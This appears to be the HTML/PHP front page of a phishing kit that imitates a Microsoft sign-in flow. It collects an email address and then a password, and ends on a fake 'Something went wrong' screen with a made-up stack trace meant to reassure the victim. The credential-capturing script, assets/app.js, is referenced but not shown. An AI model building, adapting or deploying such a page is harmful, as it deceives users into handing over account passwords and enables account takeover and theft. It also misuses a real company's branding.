<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" href="assets/logo.png" />
    <title>Sign in to your account</title>
    <link rel="stylesheet" href="assets/app.css" />
</head>

<body>
    <section id="section_uname">
        <div class="auth-wrapper">
            <img src="assets/logo.png" alt="Microsoft" />
            <h2 class="title mb-16 mt-16">Sign in</h2>
            
                <div class="mb-16">
                    <p id="error_uname" class="error"></p>
                    <input id="inp_uname" type="text" name="uname" class="input" placeholder="Email" />
                </div>
            
            <div>
                <button class="btn" id="btn_next">Next</button>
            </div>
        </div>
    </section>

    <section id="section_pwd" class="d-none">
        <div class="auth-wrapper">
            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
            <div class="identity w-100 mt-16 mb-16">
                <button class="back">
                    <img src="assets/back.png" />
                </button>
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Enter password</h2>
            
                <div class="mb-16">
                    <p id="error_pwd" class="error"></p>
                    <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
                </div>
            
            <div>
                <button class="btn" id="btn_sig">Sign in</button>
            </div>
        </div>
    </section>

    <section id="section_final" class="d-none">
        <div class="auth-wrapper">
            <img src="assets/logo.png" alt="Microsoft" class="d-block" />
            <div class="identity w-100 mt-16 mb-16">
                <span id="user_identity">a@b.com</span>
            </div>
            <h2 class="title mb-16">Something went wrong!</h2>
            <p class="p">Network Error:<br>Stack Trace (<?php echo hash('ripemd160', date("h:i:sa")); ?>)<br>Line: 152 (app.js)</p>
            <div class="btn-group">
                <button class="btn" id="btn_final">Retry</button>
            </div>
        </div>
    </section>
    <script src="assets/app.js"></script>
</body>

</html>